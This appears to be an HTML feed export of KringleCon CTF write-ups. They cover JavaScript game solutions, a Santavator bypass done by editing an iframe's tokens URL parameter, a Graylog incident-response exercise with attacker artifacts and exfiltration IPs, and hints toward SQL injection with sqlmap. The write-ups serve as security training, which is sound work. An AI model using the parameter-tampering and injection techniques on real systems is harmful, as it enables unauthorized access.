&lt;p>Initially, I have absolutely no clue how to get started on this. The description does not mention any elf to get hints, as for most previous challenges. I check Discord where I see a suggestion to solve the &lt;code>Elf Code&lt;/code> terminal next to &lt;code>Ribb Bonbowford&lt;/code> so I proceed with that:&lt;/p>
&lt;blockquote>
&lt;p>Hello - my name is Ribb Bonbowford. Nice to meet you!
Are you new to programming? It&amp;rsquo;s a handy skill for anyone in cyber security.
This challenge centers around JavaScript. Take a look at this intro and see how far it gets you!
Ready to move beyond elf commands? Don&amp;rsquo;t be afraid to mix in native JavaScript.&lt;/p>
&lt;/blockquote>
&lt;p>The game itself is quite simple at first:&lt;/p>
&lt;p>&lt;img src="../images/obj10/elfcode-lvl1.png" alt="ElfCode Level 1">&lt;/p>
&lt;p>The task is to use the character to collect all lollipops by solving challenges to unlock trapdoors and bribe munchkins. My workspace is a small text window where I can write JavaScript code, to give instructions to the character. &lt;code>Ribb&lt;/code> has some further helpful thoughts to share:&lt;/p>
&lt;blockquote>
&lt;p>Trying to extract only numbers from an array? Have you tried to filter?
Maybe you need to enumerate an object&amp;rsquo;s keys and then filter?
Getting hung up on number of lines? Maybe try to minify your code.
Is there a way to push array items to the beginning of an array? Hmm&amp;hellip;
Maybe you need to enumerate an object&amp;rsquo;s keys and then filter?
Getting hung up on number of lines? Maybe try to minify your code.
Is there a way to push array items to the beginning of an array? Hmm&amp;hellip;&lt;/p>
&lt;/blockquote>
&lt;p>Plus a few useful links that appeared in the badge:&lt;/p>
&lt;ul>
&lt;li>Want to learn a useful language?
&lt;a href="https://jgthms.com/javascript-in-14-minutes/" target="_blank" rel="noopener">JavaScript&lt;/a> is a great place to start! You can also test out your code using a
&lt;a href="https://playcode.io/" target="_blank" rel="noopener">JavaScript playground&lt;/a>.&lt;/li>
&lt;li>Did you try the JavaScript primer? There&amp;rsquo;s a great section on looping.&lt;/li>
&lt;li>
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray/filter" target="_blank" rel="noopener">There&amp;rsquo;s got to be a way&lt;/a> to filter for specific typeof
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray/filter" target="_blank" rel="noopener">items in an array&lt;/a>. Maybe the
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/typeof" target="_blank" rel="noopener">typeof operator could also be useful&lt;/a>?&lt;/li>
&lt;li>
&lt;a href="https://stackoverflow.com/questions/9907419/how-to-get-a-key-in-a-javascript-object-by-its-value" target="_blank" rel="noopener">In JavaScript you can enumerate an object&amp;rsquo;s keys using keys, and filter the array using filter&lt;/a>.&lt;/li>
&lt;/ul>
&lt;p>At first, I am not really getting the hang of it, but by the time I reach Level 4-5 I realize that it&amp;rsquo;s actually a pretty nice game that forces me to think about efficient solutions. Below is my code for the last two bonus levels:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="c1">// ---------Level 7 - Spiral -------- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="nx">sum&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dataa&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">sum&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">j&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">j&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">].&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">j&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="k">typeof&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="nx">j&lt;/span>&lt;span class="p">])&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="s1">&amp;#39;number&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">sum&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="nx">j&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">sum&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">index&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">8&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveDown&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">2&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">pull_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="o">-&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">index&lt;/span>&lt;span class="o">++&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tell_munch&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">sum&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// --------Level 8 - Zig-Zag --------- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="nx">parser&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">input&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">solution&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">input&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">item&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">input&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="nb">Object&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">keys&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">item&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">forEach&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">function&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">item&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="s2">&amp;#34;lollipop&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">solution&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">key&lt;/span> &lt;span class="p">});&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">solution&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">leverSum&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="k">of&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">5&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">7&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">9&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">11&lt;/span>&lt;span class="p">])&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">2&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">2&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">leverSum&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">get_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">pull_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">leverSum&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">counter&lt;/span>&lt;span class="o">++&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tell_munch&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">parser&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">11&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="../images/obj10/looping-levels.png" alt="LoopingLevels">&lt;/p>
&lt;p>After all the levels are complete &lt;code>Ribb&lt;/code> is ready to share some hints on the santavator:&lt;/p>
&lt;blockquote>
&lt;p>Wow - are you a JavaScript developer? Great work!
Hey, you know, you might use your JavaScript and HTTP manipulation skills to take a crack at bypassing the Santavator&amp;rsquo;s S4.&lt;/p>
&lt;/blockquote>
&lt;p>Wait a second, these are hints for Objective 4!!&lt;/p>
&lt;p>Hmm, never mind it was a fun game after all&amp;hellip; 🤓&lt;/p>
&lt;p>I head back to the Santavator to inspect the Santavator again. My idea at this point is to visit it both as Santa and my non-Santa character to see how it behaves differently.&lt;/p>
&lt;p>Next, I notice that the elevator window is loaded into an &lt;code>iframe&lt;/code> with address &lt;code>elevator.kringlecastle.com&lt;/code>. I proceed to investigate the javascript code that&amp;rsquo;s loaded and find the below section that is quite interesting:&lt;/p>
&lt;p>&lt;img src="../images/obj10/has-token-app.png" alt="Has-Token-App">&lt;/p>
&lt;p>This code makes an AJAX request in the background only if the button is &lt;code>powered&lt;/code> (the S4 stream is functional) and the &lt;code>besanta&lt;/code> token is present. Looking further into it I find the implementation of the &lt;code>hasToken()&lt;/code> check:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="c1">// --- code from conduit.js --- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kr">const&lt;/span> &lt;span class="nx">__PARSE_URL_VARS__&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">()&lt;/span> &lt;span class="p">=&amp;gt;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">let&lt;/span> &lt;span class="nx">vars&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">{};&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">parts&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">window&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">location&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">href&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">replace&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sr">/[?&amp;amp;]+([^=&amp;amp;]+)=([^&amp;amp;]*)/gi&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="kd">function&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">m&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="nx">value&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">vars&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">value&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">});&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">vars&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="c1">// --- code from app.js --- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kr">const&lt;/span> &lt;span class="nx">getParams&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">__PARSE_URL_VARS__&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="kd">let&lt;/span> &lt;span class="nx">tokens&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">getParams&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tokens&lt;/span> &lt;span class="o">||&lt;/span> &lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">split&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;,&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">hasToken&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">name&lt;/span> &lt;span class="p">=&amp;gt;&lt;/span> &lt;span class="nx">tokens&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">indexOf&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">name&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">!==&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Basically, it parses all the URL parameters and saves them into the &lt;strong>tokens&lt;/strong> variable for later use. Looking further into the &lt;strong>iframe&lt;/strong> I find where the &lt;code>tokens&lt;/code> variable is populated and see that it contains &lt;code>besanta&lt;/code> as I was looking at it in Santa mode:&lt;/p>
&lt;p>&lt;img src="../images/obj10/besanta-tokens.png" alt="SantaTokens-Iframe">&lt;/p>
&lt;p>It seems all I need to do is tweaking the &lt;strong>iframe&lt;/strong> source to inject an extra &lt;code>besanta&lt;/code> string to the &lt;strong>tokens&lt;/strong> parameter while in non-Santa mode(!).&lt;/p>
&lt;p>The plan works, and I successfully impersonate 🎅🏻 and bypass the fingerprint reader to visit Santa&amp;rsquo;s office in disguise. While there I take a nice selfie just for fun:&lt;/p>
&lt;p>&lt;img src="../images/obj10/santa-office-selfie.png" alt="Selfie In Santa&amp;rsquo;s Office">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p>
&lt;p>&lt;strong>PS&lt;/strong>: In this moment, when the above selfie is taken, I finally understand why I chose this funky face for my avatar &amp;hellip; 😛&lt;/p></description></item><item><title>Paper Scraps Hunting</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective9/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective9/</guid><description>&lt;h2 id="graylog-to-the-rescue">Graylog to the rescue&lt;/h2>
&lt;p>After solving the CAPTEHA and winnit a lifetime supply of cookiez for Krampus, he provided you with some further clues. He first pointed you to some paper scraps he found in the vents, which he collected by using the Turtle Doves&amp;hellip; Then he mentions that he stored some scanned copies of the paper scrps on his server at: &lt;strong>studentportal.elfu.org&lt;/strong>. However, he forgot his access credentials, so he asked you to hack your way in and retrieve those images:&lt;/p>
&lt;blockquote>
&lt;p>Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.
What is the name of Santa&amp;rsquo;s cutting-edge sleigh guidance system?
For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.&lt;/p>
&lt;/blockquote>
&lt;p>If you need, you can get further hints by visiting Pepper Minstix in the dormitory. Luckily you don&amp;rsquo;t need to walk anymore, as Krampus updated your badge with a new firmware, that lets you teleport within the Elf University Campus&amp;hellip; How cool is that!&lt;/p>
&lt;p>Once you talk with Minstix, he says hge will help you out, but only after you help him with some issue he is facing:&lt;/p>
&lt;p>&lt;img src="../images/obj9-minstix.png" alt="Pepper Minstix in DORM">&lt;/p>
&lt;blockquote>
&lt;p>It&amp;rsquo;s me - Pepper Minstix.
Normally I&amp;rsquo;m jollier, but this Graylog has me a bit mystified.
Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
Some Elf U computers were hacked, and I&amp;rsquo;ve been tasked with performing incident response.
Can you help me fill out the incident response report using our instance of Graylog?
It&amp;rsquo;s probably helpful if you know a few things about Graylog.
Event IDs and Sysmon are important too. Have you spent time with those?
Don&amp;rsquo;t worry - I&amp;rsquo;m sure you can figure this all out for me!
Click on the All messages Link to access the Graylog search interface!
Make sure you are searching in all messages!
The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner.
Login with the username elfustudent and password elfustudent.&lt;/p>
&lt;/blockquote>
&lt;p>To solve this technical challenge, you need to get familiar with &lt;strong>Graylog&lt;/strong>. You can do this either via the in-game terminal or by browsing to &lt;strong>graylog.elfu.org&lt;/strong> in a new tab. In order to submit your answers though, you need to open the terminal and hover over the bottom right corner or the input forms to appear (also available at this
&lt;a href="https://report.elfu.org/" target="_blank" rel="noopener">link&lt;/a>). For the information gathering it may be easier to navigate to the service in a separate browser tab.&lt;/p>
&lt;p>To get the hints, you will need to answer these 10 questions below:&lt;/p>
&lt;h4 id="q1---what-is-the-path-and-filename-of-the-first-malicious-file-downloaded-by-minty">Q1 - What is the path and filename of the first malicious file downloaded by Minty?&lt;/h4>
&lt;p>This can be easily found by searching for the username &lt;strong>minty&lt;/strong>, enabling TargetFileName column and browsing through the log entries later in time (towards the end of all logs available). This will eventually lead you the following answer &lt;strong>C:\Users\minty\Downloads\cookie_recipe.exe&lt;/strong>.&lt;/p>
&lt;h4 id="q2---what-was-the-ipport-the-malicious-file-connected-to-first">Q2 - What was the ip:port the malicious file connected to first?&lt;/h4>
&lt;p>Within the same search results, enable columns DesinationIpAddress and DestinationPort and look for values that seem anomalous. I found the IP &lt;strong>192.168.247.175&lt;/strong> and ports &lt;strong>4443&lt;/strong> and &lt;strong>4444&lt;/strong> that seemed out of the ordinary, so I tried and the combination &lt;strong>192.168.247.175:4444&lt;/strong> was accepted as correct answer.&lt;/p>
&lt;h4 id="q3---what-was-the-first-command-executed-by-the-attacker">Q3 - What was the first command executed by the attacker?&lt;/h4>
&lt;p>If you examine the log entry right after the one which was proiding the IP and Port for the previous answer, you will see this CommandLine property: &lt;strong>C:\Windows\system32\cmd.exe /c &amp;ldquo;whoami &amp;ldquo;&lt;/strong>. Seems awfully suspicious, and indeed it holds the correct answer: &lt;strong>whoami&lt;/strong>.&lt;/p>
&lt;h4 id="q4---what-is-the-one-word-service-name-the-attacker-used-to-escalate-privileges">Q4 - What is the one-word service name the attacker used to escalate privileges?&lt;/h4>
&lt;p>So to answer this I first had to Google how services can be started on Windows systems, and found that it is usually done by calling some command that stats like &lt;strong>sc start &amp;hellip;&lt;/strong> so I searched the Graylog server for this string and found a lot of entries involving the &lt;strong>webexservice&lt;/strong> which was the correct answer.&lt;/p>
&lt;h4 id="q5---what-is-the-path--filename-of-the-binary-ran-by-the-attacker-to-dump-credentials">Q5 - What is the path &amp;amp; filename of the binary ran by the attacker to dump credentials?&lt;/h4>
&lt;p>For this question you should search for text &lt;strong>exe&lt;/strong> and within the results look for the string &lt;strong>password&lt;/strong>. You should find a suspiciously named &lt;strong>.exe&lt;/strong> called by someone, which holds the correct answer: &lt;strong>C:\cookie.exe&lt;/strong>.&lt;/p>
&lt;h4 id="q6---which-account-name-was-used-to-pivot-to-another-machine">Q6 - Which account name was used to pivot to another machine?&lt;/h4>
&lt;p>To answer this, you should notice that not all log entries have the &lt;strong>AccountName&lt;/strong> value, so you should search for &lt;strong>&lt;em>exists&lt;/em>: AccountName&lt;/strong> which returns log entries where this value exists. In the results you will find &lt;strong>minty&lt;/strong> quite often but this would not be accepted, so try some others from the results, perhaps &lt;strong>alabaster&lt;/strong> will work&amp;hellip; :)&lt;/p>
&lt;h4 id="q7---what-is-the-time-hhmmss-the-attacker-makes-a-remote-desktop-connection-to-another-machine">Q7 - What is the time (HH:MM:SS) the attacker makes a Remote Desktop connection to another machine?&lt;/h4>
&lt;p>For this I had to learn that in Windows environment the act of opening a remote connection via RDP causes an event to be generated with ID of 4624 and LogonType 10, so I searched for these values in Graylog with &lt;strong>EventID: 4624 AND LogonType:10&lt;/strong> and found the correct timestamp to be: &lt;strong>06:04:28&lt;/strong>.&lt;/p>
&lt;h4 id="q8---what-is-the-sourcehostnamedestinationhostnamelogontype-of-this-connection">Q8 - What is the &amp;lsquo;SourceHostName,DestinationHostname,LogonType&amp;rsquo; of this connection?&lt;/h4>
&lt;p>For answering this question, you should look for LogonType 3 and the existence of Source and Destination hostnames. I made the following search query: &lt;strong>LogonType: 3 AND &lt;em>exists&lt;/em>:SourceHostName AND &lt;em>exists&lt;/em>:DestinationHostname&lt;/strong> which gave the following solution: &lt;strong>ELFU-RES-WKS2,elfu-res-wks3,3&lt;/strong> (after several rounds of trial and error based on search results).&lt;/p>
&lt;h4 id="q9---what-is-the-path--filename-of-the-secret-document-being-transferred-from-the-third-host-to-the-second-host">Q9 - What is the path &amp;amp; filename of the secret document being transferred from the third host to the second host?&lt;/h4>
&lt;p>First you should look for the account &lt;strong>alabaster&lt;/strong> because the attacked was disguised under this attack, then look in the result and look for a pdf file that seems suspicious. Correct answer will be: &lt;strong>C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf&lt;/strong>.&lt;/p>
&lt;h4 id="10---what-is-the-ipv4-address-the-secret-research-document-was-exfiltrated-to">10 - What is the IPv4 address the secret research document was exfiltrated to?&lt;/h4>
&lt;p>To answer this, I listed all log entries, went the the very and and turned on CommandLine and TargetIpAddress columns, in order to see that PowerShell command was used to upload this secret pdf to some website. This revealed the target IP address: &lt;strong>104.22.3.84&lt;/strong>.&lt;/p>
&lt;p>So now the questions are answered and Pepper is ready to share some useful hints:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I&amp;rsquo;ve heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!&lt;/p>
&lt;/blockquote>
&lt;h2 id="main-objective">Main objective&lt;/h2>
&lt;p>So Pepper Minstix hinted at the
&lt;a href="http://sqlmap.org/" target="_blank" rel="noopener">tool&lt;/a> called &lt;strong>sqlmap&lt;/strong> which can help us exploit vulnerable databases tied to web applications that accept input from the users. This is quite a valuable hint. Further information in the hint include:&lt;/p>
&lt;ul>
&lt;li>&lt;a href="https://www.youtube.com/watch?v=0T6-DQtzCgM&amp;amp;feature=youtu.be">https://www.youtube.com/watch?v=0T6-DQtzCgM&amp;amp;feature=youtu.be&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.owasp.org/index.php/SQL_Injection">https://www.owasp.org/index.php/SQL_Injection&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win">https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj9-portal.png" alt="Student portal">&lt;/p>
